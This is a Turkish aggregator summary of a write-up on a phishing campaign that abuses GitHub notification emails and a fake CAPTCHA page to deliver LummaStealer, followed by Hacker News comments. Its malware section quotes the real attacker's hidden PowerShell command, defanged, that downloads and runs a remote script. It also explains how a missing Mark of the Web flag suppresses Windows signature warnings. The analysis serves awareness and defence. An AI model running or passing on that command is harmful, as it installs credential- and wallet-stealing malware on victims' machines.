GitHub bildirim e-postalarını kötüye kullanan kötü amaçlı yazılım dağıtımı olayı

 (ianspence.com)
1 puan yazan GN⁺ 2024-09-20 | 1 yorum | WhatsApp'ta paylaş
  • Açık kaynak geliştiricisi olarak GitHub'dan sık sık e-posta alıyorum
  • E-postaların çoğu, GitHub kullanıcılarının etkileşimlerine dair bildirim e-postalarıdır
  • Ancak bazı e-postalar GitHub güvenliği kimliğine bürünerek kötü amaçlı yazılım indirmenizi sağlıyor

Saldırı yöntemi

  1. Saldırgan, geçici bir GitHub hesabı kullanarak herkese açık depoda bir issue oluşturur
  2. Saldırgan issue'yu hızla siler
  3. Depo sahibi bildirim e-postasını alır
  4. E-postadaki bağlantıya tıklar
  5. Yönergeleri izleyerek sistemine kötü amaçlı yazılım bulaştırır

E-posta mesajının analizi

  • E-postanın içeriğinin büyük bölümü saldırgan tarafından kontrol edilebilir
  • E-postada yeni bir issue oluşturulduğuna dair bilgi yoktur
  • Saldırgan, "Github Security Team" kimliğine bürünür
  • E-posta GitHub üzerinden gönderildiği için phishing kontrollerini geçer

GitHub'ın iyileştirebileceği noktalar

  • E-postada daha fazla bağlam sunarak saldırının etkisi azaltılabilir
  • Saldırganın kontrol edebildiği içerik azaltılmalı ve gönderen konusunda daha fazla netlik sağlanmalı

Web sitesi

  • E-postadaki bağlantı takip edildiğinde bir CAPTCHA sayfasına gidilir
  • CAPTCHA sayfası, kullanıcıyı Windows Çalıştır kutusuna komut girmeye yönlendirir

Kötü amaçlı yazılım

  • Site şu komutu panoya kopyalar: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Bu komut bir PowerShell süreci başlatır ve script'i indirip çalıştırır

Kötü amaçlı yazılımın aşamaları

  1. PowerShell komutu üzerinden script indirilip çalıştırılır
  2. Script kötü amaçlı bir çalıştırılabilir dosya indirir ve çalıştırır
  3. Çalıştırılabilir dosyanın dijital imzası vardır ama geçerli değildir
  4. Windows geçersiz imza konusunda uyarı vermez

Windows'un zayıf noktası

  • İnternetten indirilen dosyaları tanımlayan "Mark of the Web" (MOTW) bayrağı ayarlanmaz
  • .NET Framework'ün System.Net.WebClient sınıfı MOTW bayrağını ayarlamaz
  • MOTW bayrağı ayarlanmadığında Windows geçersiz imza konusunda uyarı vermez

Kötü amaçlı yazılım analizi

  • Kötü amaçlı yazılım belleğe yüklenerek çalıştırılır
  • Bu, kripto para cüzdanları, kayıtlı kimlik bilgileri ve benzerlerini çalan LummaStealer adlı kötü amaçlı yazılımdır

Sonuç

  • GitHub bildirim e-postalarındaki zayıflığı kötüye kullanan bir saldırı vakası
  • Analiz çeşitli araçlar kullanılarak yapıldı

GN⁺ özeti

  • Bu yazı, GitHub bildirim e-postalarını kötüye kullanan bir kötü amaçlı yazılım saldırısı vakasını ele alıyor
  • GitHub'ın e-posta sistemindeki zayıflık kullanılarak kötü amaçlı yazılım dağıtıldı
  • Windows'un "Mark of the Web" bayrağı ve dijital imza doğrulamasındaki zayıflıklar kullanıldı
  • LummaStealer adlı kötü amaçlı yazılım kullanıldı
  • Bunlar GitHub ve Microsoft'a bildirilen zayıflıklardır
  • Benzer özelliklere sahip başka projeler arasında Cyfirma'nın analiz materyali öneriliyor

İlgili okumalar

1 yorum

 
GN⁺ 2024-09-20
Hacker News görüşleri

  • Kısa süre önce PayPal'dan oldukça ikna edici bir e-posta aldım

    • Birisi alıntı özelliğini kullanarak şirket adını "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...." olarak ayarlamış
    • E-posta gerçekten PayPal.com'dan geliyordu ve bu tür kullanıcı adlarını denetlememelerini anlamıyorum
    • Bunu bildirdim ama hâlâ yanıt almadım
    • E-posta, gerçek bir PayPal e-postası gibi görünecek şekilde biçimlendirilmişti; birçok kişinin kanacağına eminim

  • İnsanların gerçekten böyle dolandırıcılıklara kanıp kanmadığını merak ediyorum

    • E-postanın github'dan geldiğini bildiğinizi varsayalım
    • İlk uyarı işareti: e-posta, gerçek alan adının bir varyasyonuna bağlantı veriyor
    • İkinci uyarı işareti: captcha, kabuk komutu girmenizi istiyor

  • Junior geliştiriciler böyle dolandırıcılıklara kanabilir gibi görünüyor

    • "Aa, captcha'yı kod çalıştırarak çözmek, ne ilginç!"

  • Bir web sayfası, yalnızca tıklamayla kopyala/yapıştır panosunu dolduramamalı

    • E-postadaki bağlantılara tıklamamalı veya e-postanın içeriğine güvenmemelisiniz
    • Sorun şu ki Windows hâlâ tek satırlık bir PowerShell komutuyla root yetkisine izin veriyor

  • Github, otomatik servisler için bağlantıları doğrulamadan issue içine link koyulmasını engellemeli

    • Github, e-posta ile gönderdiği içerikleri daha iyi denetlemeli

  • github-scanner.com'un hâlâ kötü niyetli bir taraf olup olmadığını merak ediyorum

    • DNS'i Cloudflare barındırıyor ve bu sorunu bildirecek bir yol yok

  • Saldırgan issue'yu hızla silmiş

    • Issue'ları yalnızca yöneticiler silebilir
    • Bu yüzden depoda issue'nun izi kalmış

  • Güzel bir yazı, Julia Evans'ın bloguna benzer bir hava veriyor

  • 2024'te bile insanların hâlâ en basit numaralara kanıyor olması üzücü

  • Bu sabah böyle bir bildirim aldım ve görmezden geldim

    • Bildirim belirli bir depo ile ilgiliydi

  • Okumaya değer, ne yapmaya çalıştıklarını gösteriyor

    • Bağlantı tek başına bile şüpheli olabilir ama birinin bunu derinlemesine incelemesini görmek eğlenceli

  • Benzer bir GitHub bildirim e-postası aldım

    • Depoda bir güvenlik açığı bulunduğunu söylüyordu ama tıklamadım
    • Tembel bir programcı olduğum için tıklamadım